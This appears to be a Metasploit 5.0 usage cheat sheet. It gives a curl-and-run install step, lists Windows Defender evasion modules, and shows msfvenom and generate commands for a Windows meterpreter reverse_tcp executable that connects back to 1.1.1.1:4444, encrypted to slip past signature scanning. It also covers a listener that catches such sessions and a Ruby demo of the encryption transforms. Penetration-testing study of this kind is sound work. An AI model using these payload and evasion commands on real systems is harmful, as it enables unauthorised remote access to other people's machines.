install

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
# Note: https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
# is not reachable from mainland China without a proxy; once you are through, paste the install commands above.
# The script is fetched without any integrity check and then executed with your privileges, so read it
# before running it, and if it came through a proxy compare its sha256sum with a copy fetched directly.

Exploit module directory

#kali (distribution package)
/usr/share/metasploit-framework/modules/exploits
#ubuntu (omnibus installer from the step above)
/opt/metasploit-framework/embedded/framework/modules/exploits

Command line

  1. Basic commands
List all available exploit modules
show exploits
List all available auxiliary modules
show auxiliary
List the options of the currently selected module (after use)
show options
List the payloads compatible with the current module
show payloads
List the target types the current module supports
show targets
List evasion modules (new in 5.0)
show evasion
evasion/windows/windows_defender_exe
evasion/windows/windows_defender_js_hta

  2. Generating a payload on its own with the generate command

Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -x <opt>  Specify a custom executable file to use as a template
# run show payloads first to pick the payload you want to generate
# generate a Windows reverse-connect payload on its own: when executed it connects back to the
# listener on lhost:lport (the handler in the next step), so lhost must be an address the target can reach
use payload/windows/meterpreter/reverse_tcp
set lhost 1.1.1.1
set lport 4444
generate -f exe -o payload.exe    # without -o the binary goes to stdout
or
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 --encrypt base64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f c
# 5.0 added four --encrypt options: aes256 (AES-256-CBC), rc4, xor and base64.
# Only aes256 and rc4 take a key (--encrypt-key); base64 is a keyless encoding and xor with a
# short repeating key is trivially reversible, so all of these are obfuscation against static
# signatures rather than confidentiality: whatever runs the payload must carry the key too.
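The four transforms named by `--encrypt` are easy to confuse with "the payload is now protected". The block below is an added example, not Metasploit's or Rapid7's code: a plain-Ruby reference implementation of base64, repeating-key XOR, RC4 and AES-256-CBC applied to a constructed stand-in payload, plus the known-plaintext recovery that hands back an XOR key. Real msfvenom output differs in byte layout and also ships a decryption stub; the SHA-256 key derivation and fixed IV for AES are assumptions made here, not msfvenom's construction.

```ruby
# Added example, not code from Metasploit or the Rapid7 post: a reference
# implementation of the four transforms msfvenom's --encrypt option names
# (base64, xor, rc4, aes256), applied to a constructed stand-in payload.
# Real msfvenom output differs in byte layout and embeds a decryption stub;
# this only shows what each transform does and does not hide.
require 'base64'
require 'openssl'

# Constructed stand-in for shellcode: a few recognisable bytes, not a real payload.
FAKE_PAYLOAD = "\xfc\x48\x83\xe4\xf0MSF-TEST-PAYLOAD".b.freeze
KEY = 'thisisakey'.b.freeze # the key used with --encrypt-key on the page

module PayloadCrypt
  # --encrypt base64: an encoding with no key, reversible by anyone.
  def self.base64(data)
    Base64.strict_encode64(data)
  end

  def self.unbase64(blob)
    Base64.strict_decode64(blob)
  end

  # --encrypt xor: repeating-key XOR. It is its own inverse, so the same
  # function decrypts.
  def self.xor(data, key)
    raise ArgumentError, 'empty key' if key.empty?
    data.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }.pack('C*')
  end

  # Known-plaintext attack on repeating-key XOR: if an analyst knows (or
  # guesses) the first key.bytesize bytes of the payload, every key byte
  # falls out as ciphertext XOR plaintext. This is why XOR is obfuscation,
  # not confidentiality.
  def self.recover_xor_key(ciphertext, known_prefix)
    xor(ciphertext.byteslice(0, known_prefix.bytesize), known_prefix)
  end

  # --encrypt rc4: standard RC4 (KSA then PRGA). Symmetric, so rc4 also decrypts.
  def self.rc4(data, key)
    s = (0..255).to_a
    j = 0
    256.times do |i|
      j = (j + s[i] + key.getbyte(i % key.bytesize)) & 0xff
      s[i], s[j] = s[j], s[i]
    end
    i = j = 0
    data.bytes.map do |byte|
      i = (i + 1) & 0xff
      j = (j + s[i]) & 0xff
      s[i], s[j] = s[j], s[i]
      byte ^ s[(s[i] + s[j]) & 0xff]
    end.pack('C*')
  end

  # --encrypt aes256: AES-256-CBC. Deriving the key as SHA-256(passphrase) and
  # passing a caller-chosen IV are assumptions for this example, not
  # msfvenom's exact construction.
  def self.aes256(data, key, iv)
    c = OpenSSL::Cipher.new('aes-256-cbc')
    c.encrypt
    c.key = OpenSSL::Digest::SHA256.digest(key)
    c.iv = iv
    c.update(data) + c.final
  end

  def self.unaes256(blob, key, iv)
    c = OpenSSL::Cipher.new('aes-256-cbc')
    c.decrypt
    c.key = OpenSSL::Digest::SHA256.digest(key)
    c.iv = iv
    c.update(blob) + c.final
  end
end

# Run every transform and its inverse over the stand-in payload; returns a
# hash so the results can be inspected rather than only printed.
def demo(payload = FAKE_PAYLOAD, key = KEY)
  iv = "\x00".b * 16 # fixed IV only so the example is deterministic
  {
    base64_roundtrip: PayloadCrypt.unbase64(PayloadCrypt.base64(payload)) == payload,
    xor_roundtrip: PayloadCrypt.xor(PayloadCrypt.xor(payload, key), key) == payload,
    rc4_roundtrip: PayloadCrypt.rc4(PayloadCrypt.rc4(payload, key), key) == payload,
    aes_roundtrip: PayloadCrypt.unaes256(PayloadCrypt.aes256(payload, key, iv), key, iv) == payload,
    # a known payload prefix hands the XOR key straight back
    xor_key_leak: PayloadCrypt.recover_xor_key(PayloadCrypt.xor(payload, key),
                                               payload.byteslice(0, key.bytesize))
  }
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

`xor_key_leak` comes back as the literal key, which is the practical point: the only transform here that resists an analyst holding the binary is AES (and RC4 with a long key), and even then the stub that runs the payload must contain the key, so the protection is against signature scanning of the file at rest, not against anyone who executes or debugs it.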
  3. Listening on the local port
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 1.1.1.1
set lport 4444
set ExitOnSession false    # keep listening after the first session instead of exiting
exploit -j                 # run the handler as a background job
or use the handler command, which sets up the same background job in one line
handler -H 1.1.1.1 -P 4444 -p windows/meterpreter/reverse_tcp

  • handler command help
Usage: handler [options]

Spin up a Payload Handler as background job.

OPTIONS:

    -H <opt>  The RHOST/LHOST to configure the handler for
    -P <opt>  The RPORT/LPORT to configure the handler for
    -e <opt>  An Encoder to use for Payload Stage Encoding
    -h        Help Banner
    -n <opt>  The custom name to give the handler job
    -p <opt>  The payload to configure the handler for
    -x        Shut the Handler down after a session is established

References:

  1. https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released/
  2. https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service